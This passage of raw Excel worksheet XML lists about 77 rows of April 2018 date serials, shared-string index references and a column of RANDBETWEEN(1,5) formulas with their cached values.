    <row r="16637" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16637" s="1">
        <v>43197.563564814816</v>
      </c>
      <c r="C16637" t="s">
        <v>6829</v>
      </c>
      <c r="D16637" t="s">
        <v>39</v>
      </c>
      <c r="E16637" s="2" t="s">
        <v>14980</v>
      </c>
      <c r="F16637">
        <f t="shared" ca="1" si="259"/>
        <v>2</v>
      </c>
    </row>
    <row r="16638" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16638" s="1">
        <v>43197.550868055558</v>
      </c>
      <c r="C16638" t="s">
        <v>107</v>
      </c>
      <c r="D16638" t="s">
        <v>82</v>
      </c>
      <c r="E16638" t="s">
        <v>14909</v>
      </c>
      <c r="F16638">
        <f t="shared" ca="1" si="259"/>
        <v>5</v>
      </c>
    </row>
    <row r="16639" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16639" s="1">
        <v>43197.545034722221</v>
      </c>
      <c r="C16639" t="s">
        <v>10</v>
      </c>
      <c r="D16639" t="s">
        <v>112</v>
      </c>
      <c r="E16639" t="s">
        <v>14981</v>
      </c>
      <c r="F16639">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16640" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A16640" s="1">
        <v>43197.528310185182</v>
      </c>
      <c r="C16640" t="s">
        <v>2545</v>
      </c>
      <c r="D16640" t="s">
        <v>151</v>
      </c>
      <c r="E16640" s="2" t="s">
        <v>14983</v>
      </c>
      <c r="F16640">
        <f t="shared" ca="1" si="259"/>
        <v>3</v>
      </c>
    </row>
    <row r="16641" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16641" s="1">
        <v>43197.513159722221</v>
      </c>
      <c r="C16641" t="s">
        <v>107</v>
      </c>
      <c r="D16641" t="s">
        <v>158</v>
      </c>
      <c r="E16641" t="s">
        <v>14909</v>
      </c>
      <c r="F16641">
        <f t="shared" ca="1" si="259"/>
        <v>4</v>
      </c>
    </row>
    <row r="16642" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16642" s="1">
        <v>43197.469965277778</v>
      </c>
      <c r="C16642" t="s">
        <v>1510</v>
      </c>
      <c r="D16642" t="s">
        <v>336</v>
      </c>
      <c r="E16642" s="2" t="s">
        <v>14984</v>
      </c>
      <c r="F16642">
        <f t="shared" ref="F16642:F16705" ca="1" si="260">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="16643" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16643" s="1">
        <v>43197.469629629632</v>
      </c>
      <c r="C16643" t="s">
        <v>166</v>
      </c>
      <c r="D16643" t="s">
        <v>632</v>
      </c>
      <c r="E16643" s="2" t="s">
        <v>14985</v>
      </c>
      <c r="F16643">
        <f t="shared" ca="1" si="260"/>
        <v>4</v>
      </c>
    </row>
    <row r="16644" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16644" s="1">
        <v>43197.440243055556</v>
      </c>
      <c r="C16644" t="s">
        <v>6</v>
      </c>
      <c r="D16644" t="s">
        <v>25</v>
      </c>
      <c r="E16644" t="s">
        <v>14986</v>
      </c>
      <c r="F16644">
        <f t="shared" ca="1" si="260"/>
        <v>4</v>
      </c>
    </row>
    <row r="16645" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A16645" s="1">
        <v>43197.431655092594</v>
      </c>
      <c r="C16645" t="s">
        <v>41</v>
      </c>
      <c r="E16645" s="2" t="s">
        <v>14987</v>
      </c>
      <c r="F16645">
        <f t="shared" ca="1" si="260"/>
        <v>1</v>
      </c>
    </row>
    <row r="16646" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16646" s="1">
        <v>43197.4221412037</v>
      </c>
      <c r="C16646" t="s">
        <v>10</v>
      </c>
      <c r="D16646" t="s">
        <v>20</v>
      </c>
      <c r="E16646" t="s">
        <v>14988</v>
      </c>
      <c r="F16646">
        <f t="shared" ca="1" si="260"/>
        <v>2</v>
      </c>
    </row>
    <row r="16647" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16647" s="1">
        <v>43197.383333333331</v>
      </c>
      <c r="C16647" t="s">
        <v>231</v>
      </c>
      <c r="D16647" t="s">
        <v>263</v>
      </c>
      <c r="E16647" t="s">
        <v>14936</v>
      </c>
      <c r="F16647">
        <f t="shared" ca="1" si="260"/>
        <v>3</v>
      </c>
    </row>
    <row r="16648" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16648" s="1">
        <v>43197.36986111111</v>
      </c>
      <c r="C16648" t="s">
        <v>471</v>
      </c>
      <c r="F16648">
        <f t="shared" ca="1" si="260"/>
        <v>1</v>
      </c>
    </row>
    <row r="16649" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16649" s="1">
        <v>43197.342546296299</v>
      </c>
      <c r="C16649" t="s">
        <v>10</v>
      </c>
      <c r="D16649" t="s">
        <v>632</v>
      </c>
      <c r="E16649" t="s">
        <v>32</v>
      </c>
      <c r="F16649">
        <f t="shared" ca="1" si="260"/>
        <v>3</v>
      </c>
    </row>
    <row r="16650" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16650" s="1">
        <v>43197.334305555552</v>
      </c>
      <c r="C16650" t="s">
        <v>1510</v>
      </c>
      <c r="D16650" t="s">
        <v>821</v>
      </c>
      <c r="E16650" s="2" t="s">
        <v>14989</v>
      </c>
      <c r="F16650">
        <f t="shared" ca="1" si="260"/>
        <v>2</v>
      </c>
    </row>
    <row r="16651" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16651" s="1">
        <v>43197.316840277781</v>
      </c>
      <c r="C16651" t="s">
        <v>231</v>
      </c>
      <c r="D16651" t="s">
        <v>7</v>
      </c>
      <c r="E16651" t="s">
        <v>14936</v>
      </c>
      <c r="F16651">
        <f t="shared" ca="1" si="260"/>
        <v>4</v>
      </c>
    </row>
    <row r="16652" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A16652" s="1">
        <v>43197.268090277779</v>
      </c>
      <c r="C16652" t="s">
        <v>197</v>
      </c>
      <c r="E16652" s="2" t="s">
        <v>14990</v>
      </c>
      <c r="F16652">
        <f t="shared" ca="1" si="260"/>
        <v>1</v>
      </c>
    </row>
    <row r="16653" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16653" s="1">
        <v>43197.119745370372</v>
      </c>
      <c r="C16653" t="s">
        <v>231</v>
      </c>
      <c r="D16653" t="s">
        <v>80</v>
      </c>
      <c r="E16653" t="s">
        <v>14936</v>
      </c>
      <c r="F16653">
        <f t="shared" ca="1" si="260"/>
        <v>4</v>
      </c>
    </row>
    <row r="16654" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A16654" s="1">
        <v>43197.110694444447</v>
      </c>
      <c r="C16654" t="s">
        <v>41</v>
      </c>
      <c r="E16654" s="2" t="s">
        <v>14991</v>
      </c>
      <c r="F16654">
        <f t="shared" ca="1" si="260"/>
        <v>5</v>
      </c>
    </row>
    <row r="16655" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16655" s="1">
        <v>43196.942199074074</v>
      </c>
      <c r="C16655" t="s">
        <v>1510</v>
      </c>
      <c r="D16655" t="s">
        <v>885</v>
      </c>
      <c r="E16655" s="2" t="s">
        <v>14992</v>
      </c>
      <c r="F16655">
        <f t="shared" ca="1" si="260"/>
        <v>5</v>
      </c>
    </row>
    <row r="16656" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16656" s="1">
        <v>43196.887673611112</v>
      </c>
      <c r="C16656" t="s">
        <v>48</v>
      </c>
      <c r="D16656" t="s">
        <v>2139</v>
      </c>
      <c r="E16656" s="2" t="s">
        <v>14993</v>
      </c>
      <c r="F16656">
        <f t="shared" ca="1" si="260"/>
        <v>3</v>
      </c>
    </row>
    <row r="16657" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A16657" s="1">
        <v>43196.883252314816</v>
      </c>
      <c r="C16657" t="s">
        <v>5361</v>
      </c>
      <c r="D16657" t="s">
        <v>271</v>
      </c>
      <c r="E16657" s="2" t="s">
        <v>14994</v>
      </c>
      <c r="F16657">
        <f t="shared" ca="1" si="260"/>
        <v>4</v>
      </c>
    </row>
    <row r="16658" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16658" s="1">
        <v>43196.857025462959</v>
      </c>
      <c r="C16658" t="s">
        <v>231</v>
      </c>
      <c r="D16658" t="s">
        <v>46</v>
      </c>
      <c r="E16658" t="s">
        <v>14936</v>
      </c>
      <c r="F16658">
        <f t="shared" ca="1" si="260"/>
        <v>5</v>
      </c>
    </row>
    <row r="16659" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A16659" s="1">
        <v>43196.855983796297</v>
      </c>
      <c r="C16659" t="s">
        <v>10</v>
      </c>
      <c r="D16659" t="s">
        <v>6</v>
      </c>
      <c r="E16659" s="2" t="s">
        <v>14995</v>
      </c>
      <c r="F16659">
        <f t="shared" ca="1" si="260"/>
        <v>2</v>
      </c>
    </row>
    <row r="16660" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16660" s="1">
        <v>43196.816238425927</v>
      </c>
      <c r="C16660" t="s">
        <v>231</v>
      </c>
      <c r="D16660" t="s">
        <v>52</v>
      </c>
      <c r="E16660" t="s">
        <v>14936</v>
      </c>
      <c r="F16660">
        <f t="shared" ca="1" si="260"/>
        <v>3</v>
      </c>
    </row>
    <row r="16661" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16661" s="1">
        <v>43196.782349537039</v>
      </c>
      <c r="C16661" t="s">
        <v>231</v>
      </c>
      <c r="D16661" t="s">
        <v>1993</v>
      </c>
      <c r="E16661" t="s">
        <v>14936</v>
      </c>
      <c r="F16661">
        <f t="shared" ca="1" si="260"/>
        <v>1</v>
      </c>
    </row>
    <row r="16662" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16662" s="1">
        <v>43196.737349537034</v>
      </c>
      <c r="C16662" t="s">
        <v>4508</v>
      </c>
      <c r="D16662" t="s">
        <v>114</v>
      </c>
      <c r="E16662" s="2" t="s">
        <v>14996</v>
      </c>
      <c r="F16662">
        <f t="shared" ca="1" si="260"/>
        <v>5</v>
      </c>
    </row>
    <row r="16663" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A16663" s="1">
        <v>43196.721805555557</v>
      </c>
      <c r="C16663" t="s">
        <v>10</v>
      </c>
      <c r="D16663" t="s">
        <v>89</v>
      </c>
      <c r="E16663" s="2" t="s">
        <v>14997</v>
      </c>
      <c r="F16663">
        <f t="shared" ca="1" si="260"/>
        <v>5</v>
      </c>
    </row>
    <row r="16664" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16664" s="1">
        <v>43196.711180555554</v>
      </c>
      <c r="C16664" t="s">
        <v>4508</v>
      </c>
      <c r="D16664" t="s">
        <v>1993</v>
      </c>
      <c r="E16664" s="2" t="s">
        <v>14998</v>
      </c>
      <c r="F16664">
        <f t="shared" ca="1" si="260"/>
        <v>4</v>
      </c>
    </row>
    <row r="16665" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16665" s="1">
        <v>43196.704652777778</v>
      </c>
      <c r="C16665" t="s">
        <v>10</v>
      </c>
      <c r="D16665" t="s">
        <v>71</v>
      </c>
      <c r="E16665" t="s">
        <v>14999</v>
      </c>
      <c r="F16665">
        <f t="shared" ca="1" si="260"/>
        <v>4</v>
      </c>
    </row>
    <row r="16666" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16666" s="1">
        <v>43196.704131944447</v>
      </c>
      <c r="C16666" t="s">
        <v>10</v>
      </c>
      <c r="D16666" t="s">
        <v>6</v>
      </c>
      <c r="E16666" t="s">
        <v>15000</v>
      </c>
      <c r="F16666">
        <f t="shared" ca="1" si="260"/>
        <v>3</v>
      </c>
    </row>
    <row r="16667" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16667" s="1">
        <v>43196.700497685182</v>
      </c>
      <c r="C16667" t="s">
        <v>10</v>
      </c>
      <c r="D16667" t="s">
        <v>86</v>
      </c>
      <c r="E16667" s="2" t="s">
        <v>15001</v>
      </c>
      <c r="F16667">
        <f t="shared" ca="1" si="260"/>
        <v>4</v>
      </c>
    </row>
    <row r="16668" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16668" s="1">
        <v>43196.693078703705</v>
      </c>
      <c r="C16668" t="s">
        <v>1130</v>
      </c>
      <c r="D16668" t="s">
        <v>2214</v>
      </c>
      <c r="E16668" t="s">
        <v>1511</v>
      </c>
      <c r="F16668">
        <f t="shared" ca="1" si="260"/>
        <v>1</v>
      </c>
    </row>
    <row r="16669" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16669" s="1">
        <v>43196.647638888891</v>
      </c>
      <c r="C16669" t="s">
        <v>10</v>
      </c>
      <c r="D16669" t="s">
        <v>17</v>
      </c>
      <c r="E16669" t="s">
        <v>15002</v>
      </c>
      <c r="F16669">
        <f t="shared" ca="1" si="260"/>
        <v>1</v>
      </c>
    </row>
    <row r="16670" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A16670" s="1">
        <v>43196.646793981483</v>
      </c>
      <c r="C16670" t="s">
        <v>222</v>
      </c>
      <c r="E16670" s="2" t="s">
        <v>15003</v>
      </c>
      <c r="F16670">
        <f t="shared" ca="1" si="260"/>
        <v>3</v>
      </c>
    </row>
    <row r="16671" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16671" s="1">
        <v>43196.645069444443</v>
      </c>
      <c r="C16671" t="s">
        <v>10</v>
      </c>
      <c r="D16671" t="s">
        <v>80</v>
      </c>
      <c r="E16671" t="s">
        <v>15004</v>
      </c>
      <c r="F16671">
        <f t="shared" ca="1" si="260"/>
        <v>2</v>
      </c>
    </row>
    <row r="16672" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16672" s="1">
        <v>43196.641018518516</v>
      </c>
      <c r="C16672" t="s">
        <v>48</v>
      </c>
      <c r="E16672" s="2" t="s">
        <v>15005</v>
      </c>
      <c r="F16672">
        <f t="shared" ca="1" si="260"/>
        <v>3</v>
      </c>
    </row>
    <row r="16673" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16673" s="1">
        <v>43196.634664351855</v>
      </c>
      <c r="C16673" t="s">
        <v>10</v>
      </c>
      <c r="D16673" t="s">
        <v>6</v>
      </c>
      <c r="E16673" t="s">
        <v>15006</v>
      </c>
      <c r="F16673">
        <f t="shared" ca="1" si="260"/>
        <v>2</v>
      </c>
    </row>
    <row r="16674" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A16674" s="1">
        <v>43196.630243055559</v>
      </c>
      <c r="C16674" t="s">
        <v>10</v>
      </c>
      <c r="D16674" t="s">
        <v>94</v>
      </c>
      <c r="E16674" s="2" t="s">
        <v>15007</v>
      </c>
      <c r="F16674">
        <f t="shared" ca="1" si="260"/>
        <v>5</v>
      </c>
    </row>
    <row r="16675" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A16675" s="1">
        <v>43196.624328703707</v>
      </c>
      <c r="C16675" t="s">
        <v>2733</v>
      </c>
      <c r="D16675" t="s">
        <v>192</v>
      </c>
      <c r="E16675" s="2" t="s">
        <v>15008</v>
      </c>
      <c r="F16675">
        <f t="shared" ca="1" si="260"/>
        <v>5</v>
      </c>
    </row>
    <row r="16676" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A16676" s="1">
        <v>43196.616365740738</v>
      </c>
      <c r="C16676" t="s">
        <v>10</v>
      </c>
      <c r="D16676" t="s">
        <v>41</v>
      </c>
      <c r="E16676" s="2" t="s">
        <v>15009</v>
      </c>
      <c r="F16676">
        <f t="shared" ca="1" si="260"/>
        <v>4</v>
      </c>
    </row>
    <row r="16677" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A16677" s="1">
        <v>43196.613437499997</v>
      </c>
      <c r="C16677" t="s">
        <v>43</v>
      </c>
      <c r="E16677" s="2" t="s">
        <v>15010</v>
      </c>
      <c r="F16677">
        <f t="shared" ca="1" si="260"/>
        <v>1</v>
      </c>
    </row>
    <row r="16678" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16678" s="1">
        <v>43196.590497685182</v>
      </c>
      <c r="C16678" t="s">
        <v>10</v>
      </c>
      <c r="D16678" t="s">
        <v>336</v>
      </c>
      <c r="E16678" t="s">
        <v>15011</v>
      </c>
      <c r="F16678">
        <f t="shared" ca="1" si="260"/>
        <v>4</v>
      </c>
    </row>
    <row r="16679" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16679" s="1">
        <v>43196.590300925927</v>
      </c>
      <c r="C16679" t="s">
        <v>10</v>
      </c>
      <c r="D16679" t="s">
        <v>52</v>
      </c>
      <c r="E16679" t="s">
        <v>15012</v>
      </c>
      <c r="F16679">
        <f t="shared" ca="1" si="260"/>
        <v>2</v>
      </c>
    </row>
    <row r="16680" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16680" s="1">
        <v>43196.587372685186</v>
      </c>
      <c r="C16680" t="s">
        <v>41</v>
      </c>
      <c r="E16680" t="s">
        <v>15013</v>
      </c>
      <c r="F16680">
        <f t="shared" ca="1" si="260"/>
        <v>2</v>
      </c>
    </row>
    <row r="16681" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A16681" s="1">
        <v>43196.568333333336</v>
      </c>
      <c r="C16681" t="s">
        <v>454</v>
      </c>
      <c r="D16681" t="s">
        <v>158</v>
      </c>
      <c r="E16681" s="2" t="s">
        <v>15014</v>
      </c>
      <c r="F16681">
        <f t="shared" ca="1" si="260"/>
        <v>1</v>
      </c>
    </row>
    <row r="16682" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16682" s="1">
        <v>43196.552175925928</v>
      </c>
      <c r="C16682" t="s">
        <v>10</v>
      </c>
      <c r="D16682" t="s">
        <v>163</v>
      </c>
      <c r="E16682" t="s">
        <v>15015</v>
      </c>
      <c r="F16682">
        <f t="shared" ca="1" si="260"/>
        <v>4</v>
      </c>
    </row>
    <row r="16683" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16683" s="1">
        <v>43196.51425925926</v>
      </c>
      <c r="C16683" t="s">
        <v>10</v>
      </c>
      <c r="D16683" t="s">
        <v>330</v>
      </c>
      <c r="E16683" t="s">
        <v>15016</v>
      </c>
      <c r="F16683">
        <f t="shared" ca="1" si="260"/>
        <v>3</v>
      </c>
    </row>
    <row r="16684" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16684" s="1">
        <v>43196.463217592594</v>
      </c>
      <c r="C16684" t="s">
        <v>10</v>
      </c>
      <c r="D16684" t="s">
        <v>112</v>
      </c>
      <c r="E16684" t="s">
        <v>15017</v>
      </c>
      <c r="F16684">
        <f t="shared" ca="1" si="260"/>
        <v>1</v>
      </c>
    </row>
    <row r="16685" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16685" s="1">
        <v>43196.428483796299</v>
      </c>
      <c r="C16685" t="s">
        <v>6</v>
      </c>
      <c r="D16685" t="s">
        <v>25</v>
      </c>
      <c r="E16685" t="s">
        <v>3485</v>
      </c>
      <c r="F16685">
        <f t="shared" ca="1" si="260"/>
        <v>4</v>
      </c>
    </row>
    <row r="16686" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A16686" s="1">
        <v>43196.396215277775</v>
      </c>
      <c r="C16686" t="s">
        <v>10</v>
      </c>
      <c r="D16686" t="s">
        <v>80</v>
      </c>
      <c r="E16686" s="2" t="s">
        <v>15018</v>
      </c>
      <c r="F16686">
        <f t="shared" ca="1" si="260"/>
        <v>2</v>
      </c>
    </row>
    <row r="16687" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16687" s="1">
        <v>43196.379444444443</v>
      </c>
      <c r="C16687" t="s">
        <v>63</v>
      </c>
      <c r="E16687" t="s">
        <v>15019</v>
      </c>
      <c r="F16687">
        <f t="shared" ca="1" si="260"/>
        <v>3</v>
      </c>
    </row>
    <row r="16688" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16688" s="1">
        <v>43196.378206018519</v>
      </c>
      <c r="C16688" t="s">
        <v>10</v>
      </c>
      <c r="D16688" t="s">
        <v>112</v>
      </c>
      <c r="E16688" t="s">
        <v>15020</v>
      </c>
      <c r="F16688">
        <f t="shared" ca="1" si="260"/>
        <v>2</v>
      </c>
    </row>
    <row r="16689" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16689" s="1">
        <v>43196.37300925926</v>
      </c>
      <c r="C16689" t="s">
        <v>260</v>
      </c>
      <c r="E16689" t="s">
        <v>15021</v>
      </c>
      <c r="F16689">
        <f t="shared" ca="1" si="260"/>
        <v>5</v>
      </c>
    </row>
    <row r="16690" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16690" s="1">
        <v>43196.369421296295</v>
      </c>
      <c r="C16690" t="s">
        <v>41</v>
      </c>
      <c r="E16690" t="s">
        <v>15022</v>
      </c>
      <c r="F16690">
        <f t="shared" ca="1" si="260"/>
        <v>2</v>
      </c>
    </row>
    <row r="16691" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A16691" s="1">
        <v>43196.359583333331</v>
      </c>
      <c r="C16691" t="s">
        <v>71</v>
      </c>
      <c r="E16691" s="2" t="s">
        <v>15023</v>
      </c>
      <c r="F16691">
        <f t="shared" ca="1" si="260"/>
        <v>1</v>
      </c>
    </row>
    <row r="16692" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A16692" s="1">
        <v>43196.353229166663</v>
      </c>
      <c r="C16692" t="s">
        <v>50</v>
      </c>
      <c r="E16692" s="2" t="s">
        <v>15024</v>
      </c>
      <c r="F16692">
        <f t="shared" ca="1" si="260"/>
        <v>1</v>
      </c>
    </row>
    <row r="16693" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A16693" s="1">
        <v>43196.349907407406</v>
      </c>
      <c r="C16693" t="s">
        <v>48</v>
      </c>
      <c r="E16693" s="2" t="s">
        <v>15025</v>
      </c>
      <c r="F16693">
        <f t="shared" ca="1" si="260"/>
        <v>2</v>
      </c>
    </row>
    <row r="16694" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A16694" s="1">
        <v>43196.331273148149</v>
      </c>
      <c r="C16694" t="s">
        <v>10</v>
      </c>
      <c r="D16694" t="s">
        <v>112</v>
      </c>
      <c r="E16694" s="2" t="s">
        <v>15026</v>
      </c>
      <c r="F16694">
        <f t="shared" ca="1" si="260"/>
        <v>3</v>
      </c>
    </row>
    <row r="16695" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A16695" s="1">
        <v>43196.309814814813</v>
      </c>
      <c r="C16695" t="s">
        <v>2156</v>
      </c>
      <c r="D16695" t="s">
        <v>381</v>
      </c>
      <c r="E16695" s="2" t="s">
        <v>15027</v>
      </c>
      <c r="F16695">
        <f t="shared" ca="1" si="260"/>
        <v>2</v>
      </c>
    </row>
    <row r="16696" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A16696" s="1">
        <v>43196.285092592596</v>
      </c>
      <c r="C16696" t="s">
        <v>71</v>
      </c>
      <c r="E16696" s="2" t="s">
        <v>15028</v>
      </c>
      <c r="F16696">
        <f t="shared" ca="1" si="260"/>
        <v>5</v>
      </c>
    </row>
    <row r="16697" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A16697" s="1">
        <v>43196.283738425926</v>
      </c>
      <c r="C16697" t="s">
        <v>60</v>
      </c>
      <c r="E16697" s="2" t="s">
        <v>15029</v>
      </c>
      <c r="F16697">
        <f t="shared" ca="1" si="260"/>
        <v>5</v>
      </c>
    </row>
    <row r="16698" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16698" s="1">
        <v>43196.280555555553</v>
      </c>
      <c r="C16698" t="s">
        <v>73</v>
      </c>
      <c r="D16698" t="s">
        <v>71</v>
      </c>
      <c r="E16698" s="2" t="s">
        <v>15030</v>
      </c>
      <c r="F16698">
        <f t="shared" ca="1" si="260"/>
        <v>2</v>
      </c>
    </row>
    <row r="16699" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16699" s="1">
        <v>43196.264780092592</v>
      </c>
      <c r="C16699" t="s">
        <v>139</v>
      </c>
      <c r="D16699" t="s">
        <v>244</v>
      </c>
      <c r="E16699" s="2" t="s">
        <v>15031</v>
      </c>
      <c r="F16699">
        <f t="shared" ca="1" si="260"/>
        <v>5</v>
      </c>
    </row>
    <row r="16700" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16700" s="1">
        <v>43196.260243055556</v>
      </c>
      <c r="C16700" t="s">
        <v>7491</v>
      </c>
      <c r="D16700" t="s">
        <v>336</v>
      </c>
      <c r="E16700" s="2" t="s">
        <v>15032</v>
      </c>
      <c r="F16700">
        <f t="shared" ca="1" si="260"/>
        <v>3</v>
      </c>
    </row>
    <row r="16701" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A16701" s="1">
        <v>43196.242951388886</v>
      </c>
      <c r="C16701" t="s">
        <v>178</v>
      </c>
      <c r="E16701" s="2" t="s">
        <v>15033</v>
      </c>
      <c r="F16701">
        <f t="shared" ca="1" si="260"/>
        <v>5</v>
      </c>
    </row>
    <row r="16702" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A16702" s="1">
        <v>43196.190879629627</v>
      </c>
      <c r="C16702" t="s">
        <v>319</v>
      </c>
      <c r="D16702" t="s">
        <v>320</v>
      </c>
      <c r="E16702" s="2" t="s">
        <v>15034</v>
      </c>
      <c r="F16702">
        <f t="shared" ca="1" si="260"/>
        <v>5</v>
      </c>
    </row>
    <row r="16703" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A16703" s="1">
        <v>43196.166435185187</v>
      </c>
      <c r="C16703" t="s">
        <v>6230</v>
      </c>
      <c r="D16703" t="s">
        <v>1091</v>
      </c>
      <c r="E16703" s="2" t="s">
        <v>15035</v>
      </c>
      <c r="F16703">
        <f t="shared" ca="1" si="260"/>
        <v>3</v>
      </c>
    </row>
    <row r="16704" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A16704" s="1">
        <v>43196.121319444443</v>
      </c>
      <c r="C16704" t="s">
        <v>50</v>
      </c>
      <c r="E16704" s="2" t="s">
        <v>15036</v>
      </c>
      <c r="F16704">
        <f t="shared" ca="1" si="260"/>
        <v>2</v>
      </c>
    </row>
    <row r="16705" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A16705" s="1">
        <v>43196.0466087963</v>
      </c>
      <c r="C16705" t="s">
        <v>71</v>
      </c>
      <c r="D16705" t="s">
        <v>381</v>
      </c>
      <c r="E16705" s="2" t="s">
        <v>15037</v>
      </c>
      <c r="F16705">
        <f t="shared" ca="1" si="260"/>
        <v>4</v>
      </c>
    </row>
    <row r="16706" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A16706" s="1">
        <v>43196.013298611113</v>
      </c>
      <c r="C16706" t="s">
        <v>140</v>
      </c>
      <c r="D16706" t="s">
        <v>141</v>
      </c>
      <c r="E16706" s="2" t="s">
        <v>15038</v>
      </c>
      <c r="F16706">
        <f t="shared" ref="F16706:F16769" ca="1" si="261">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="16707" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16707" s="1">
        <v>43196.00681712963</v>
      </c>
      <c r="C16707" t="s">
        <v>2733</v>
      </c>
      <c r="E16707" t="s">
        <v>15039</v>
      </c>
      <c r="F16707">
        <f t="shared" ca="1" si="261"/>
        <v>4</v>
      </c>
    </row>
    <row r="16708" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16708" s="1">
        <v>43195.984872685185</v>
      </c>
      <c r="C16708" t="s">
        <v>253</v>
      </c>
      <c r="E16708" t="s">
        <v>15040</v>
      </c>
      <c r="F16708">
        <f t="shared" ca="1" si="261"/>
        <v>2</v>
      </c>
    </row>
    <row r="16709" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16709" s="1">
        <v>43195.948240740741</v>
      </c>
      <c r="C16709" t="s">
        <v>144</v>
      </c>
      <c r="E16709" t="s">
        <v>15041</v>
      </c>
      <c r="F16709">
        <f t="shared" ca="1" si="261"/>
        <v>2</v>
      </c>
    </row>
    <row r="16710" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A16710" s="1">
        <v>43195.935185185182</v>
      </c>
      <c r="C16710" t="s">
        <v>73</v>
      </c>
      <c r="E16710" s="2" t="s">
        <v>15042</v>
      </c>
      <c r="F16710">
        <f t="shared" ca="1" si="261"/>
        <v>5</v>
      </c>
    </row>
    <row r="16711" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A16711" s="1">
        <v>43195.775138888886</v>
      </c>
      <c r="C16711" t="s">
        <v>140</v>
      </c>
      <c r="D16711" t="s">
        <v>46</v>
      </c>
      <c r="E16711" t="s">
        <v>15043</v>
      </c>
      <c r="F16711">
        <f t="shared" ca="1" si="261"/>
        <v>1</v>
      </c>
    </row>
    <row r="16712" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16712" s="1">
        <v>43195.754953703705</v>
      </c>
      <c r="C16712" t="s">
        <v>5361</v>
      </c>
      <c r="D16712" t="s">
        <v>14</v>
      </c>
      <c r="E16712" s="2" t="s">
        <v>15044</v>
      </c>
      <c r="F16712">
        <f t="shared" ca="1" si="261"/>
        <v>2</v>
      </c>
    </row>
    <row r="16713" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A16713" s="1">
        <v>43195.746319444443</v>
      </c>
